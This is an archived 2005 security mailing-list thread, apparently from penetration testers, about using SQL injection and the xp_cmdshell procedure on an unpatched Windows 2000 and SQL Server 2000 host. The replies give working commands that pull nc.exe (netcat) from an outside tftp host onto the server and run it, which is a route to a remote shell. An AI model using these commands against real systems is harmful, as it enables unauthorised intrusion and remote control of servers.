From: Frederic Charpentier (fcharpen@xmcopartners.com)
Date: Thu Jun 23 2005 - 09:48:27 EDT
HI jose,
try like that
xp_cmdshell 'tftp -i yourHost GET nc.exe'
xp_cmdshell 'nc.exe'
and you will work in the current directory (c:\windows\system32).
Jose Selvi wrote:
> Maybe sqlsvc user can't write in c:\ folder. Can He?.
>
> The first call to tftp you are using Administrator user, who of course
> can write in c:\ .
>
> Try "runas /user:sqlsvc tftp -i myHost GET nc.exe c:\winnt\temp\nc.exe".
> It must work.
>
> Andres Molinetti escribió:
>
>> Hi, I am testing a Web App vulnerable to SQL Injection.
>> It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.
>>
>> While trying to use the xp_cmdshell to upload nc.exe from my tftpd
>> server to the Webserver, I experienced some problems.
>>
>> I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.
>>
>> As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost
>> GET nc.exe c:\nc.exe". File is downloaded.
>>
>> When I tried it through the wep app it failed. I tried directly
>> through SQL Query Analizer and it also failed.
>>
>> SQL is running as a low priviledged account (sqlsvc)...
>>
>> Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET
>> nc.exe c:\nc.exe" and IT FAILED.!!
>>
>> I can easily deduce that the problem is the TFTP client (tftp.exe)...
>>
>> Any Ideas?
>
>
-- Frederic Charpentier - Xmco Partners Security Consulting / Pentest web : http://www.xmcopartners.com
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:29 EDT